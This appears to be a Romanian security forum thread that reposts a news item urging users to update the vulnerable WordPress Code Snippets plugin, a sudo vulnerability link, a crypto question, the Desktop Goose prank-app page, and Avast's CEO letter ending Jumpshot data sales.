Un plugin de Wordpress poate permite atacatorilor să preia controlul site-urilor. Utilizatorii ar trebui să îl actualizeze imediat Cătălin Niţu - 4 Feb 2020 Dacă aveţi un site realizat pe platforma Wordpress, probabil că ar trebui să faceţi update cât mai rapid la unul dintre plugin-urile foarte populare, pe care s-ar putea să îl folosiţi. Este vorba despre Code Snippets, un plugin foarte util, care permite rularea de cod PHP fără a necesita editarea fişierului de funcţii din Wordpress. Problema a fost depistată de cercetători în securitate, care au descoperit că prin intermediul acestui plugin, poţi integra cod nesemnat care să permită atacatorilor să preia controlul site-ului. Din fericire, dezvoltatorii Code Snippets au rezolvat deja problema şi nu mai permit rularea de cod care necesită drepturi de administrator. Astfel, este de ajuns să intri în dashboard-ul Wordpress şi să cauţi secţiunea de actualizare, unde ar trebui să apară update-ul pentru Code Snippets. Pentru cei care preferă metoda manuală, este de ajuns să descarci Code Snippets în format .zip de pe site-ul oficial şi să îl instalezi manual tot din dashboard. Conform informaţiilor disponbile în acest moment, există mai mult de 200.000 de site-uri care folosesc acest plugin şi care pot fi vulnerabile la un astfel de atac. Totuşi, codul maliţios trebuie introdus manual de către administrator, deci pericolul nu este atât de iminent pentru toţi utilizatorii. Dacă nu aveţi posibilitatea de a face update prea curând, încercaţi în schimb să nu introduceţi cod PHP din surse care nu sunt de încredere, sau care nu ştiţi exact ce face, în acest plugin. Totuşi, vulnerabilităţile în platforma Wordpress şi în diverse plugin-uri populare nu sunt tocmai ieşite din comun. În trecut au fost realizate atacuri folosind un plugin pentru un formular de contact şi vulnerabilităţi care au fost corectate în timp. Este indicat să aveţi întotdeauna versiunea Wordpress la zi şi plugin-urile actualizate. Uneori însă, compatibilitatea dintre platformă şi plugin-uri se strică la update. Cel mai indicat este însă să folosiţi cât mai puţine plugin-uri complexe, pentru a asigura o viteză de încărcare mai mare. Sursa: https://www.go4it.ro/internet/un-plugin-de-wordpress-poate-permite-atacatorilor-sa-preia-controlul-site-urilor.-utilizatorii-ar-trebui-sa-il-actualizeze-imediat-18787594/?

Vulnerabilitatea afecteaza si Mac-urile: https://www.techradar.com/news/linux-and-macos-pcs-hit-by-serious-sudo-vulnerability

Nu am investit si probabil nu voi investi niciodata in cryptomonede, dar de curiozitate, a castigat cineva ceva consistent de pe urma acestor tranzactii? Ma refer aici la sume de mii de euro sau mai mult, nu la 50 EUR.

Pentru cei interesati de acest "utilitar", a aparut si versiunea pentru Mac.

Desktop Goose Check me out on twitter at @samnchiet HONK HONK, HEAR YE. I have created a goose for your desktop. He'll nab your mouse, track mud on your screen... leave you a message, deliver you memes? Play video games with a desktop buddy who will attack you if you poke him. Fill out spreadsheets while your screen fills up with instances of Goose Notepad. STREAMERS/YOUTUBERS - DM me on twitter for a custom build, with AI written to be more antagonistic towards gameplay. This is not a final itch page - just trying to get something up so I can upload the project tonight! More information Download Download NowName your own price Click download now to get access to the following files: Desktop Goose v0.13 MB Sursa: https://samperson.itch.io/desktop-goose

A message from Avast CEO Ondrej Vlcek Avast, 29 January 2020 To all our valued stakeholders – customers, partners, employees and investors, I’d like to take this opportunity and address the situation regarding Avast’s sale of user data through its subsidiary Jumpshot. Avast’s core mission is to keep people around the world safe and secure, and I realize the recent news about Jumpshot has hurt the feelings of many of you, and rightfully raised a number of questions – including the fundamental question of trust. As CEO of Avast, I feel personally responsible and I would like to apologize to all concerned. Protecting people is Avast’s top priority and must be embedded in everything we do in our business and in our products. Anything to the contrary is unacceptable. For these reasons, I – together with our board of directors – have decided to terminate the Jumpshot data collection and wind down Jumpshot’s operations, with immediate effect. To understand why we have come to this decision, let me give you some context. We started Jumpshot in 2015 with the idea of extending our data analytics capabilities beyond core security. This was during a period where it was becoming increasingly apparent that cybersecurity was going to be a big data game. We thought we could leverage our tools and resources to do this more securely than the countless other companies that were collecting data. Jumpshot has operated as an independent company from the very beginning, with its own management and board of directors, building their products and services via the data feed coming from the Avast antivirus products. During all those years, both Avast and Jumpshot acted fully within legal bounds – and we very much welcomed the introduction of GDPR in the European Union in May 2018, as it was a rigorous legal framework addressing how companies should treat customer data. Both Avast and Jumpshot committed themselves to 100% GDPR compliance. When I took on the role as CEO of Avast seven months ago, I spent a lot of time re-evaluating every portion of our business. During this process, I came to the conclusion that the data collection business is not in line with our privacy priorities as a company in 2020 and beyond. It is key to me that Avast’s sole purpose is to make the world a safer place, and I knew that ultimately, everything in the company would have to become aligned with that North Star of ours. While the decision we have made will regrettably impact hundreds of loyal Jumpshot employees and dozens of its customers, it is absolutely the right thing to do. I firmly believe it will help Avast focus on and unlock its full potential to deliver on its promise of security and privacy. And I especially thank our users, whose recent feedback accelerated our decision to take quick action. This change represents a new chapter in Avast’s history of keeping people around the world safe and secure. We’re excited to demonstrate our commitment to innovation and security priorities – with a singular focus in 2020 and beyond. Thank you for your continued support and the trust you are putting into us. We will not disappoint. Respectfully yours, Ondrej Vlcek, CEO Avast Sursa: https://blog.avast.com/a-message-from-ceo-ondrej-vlcek?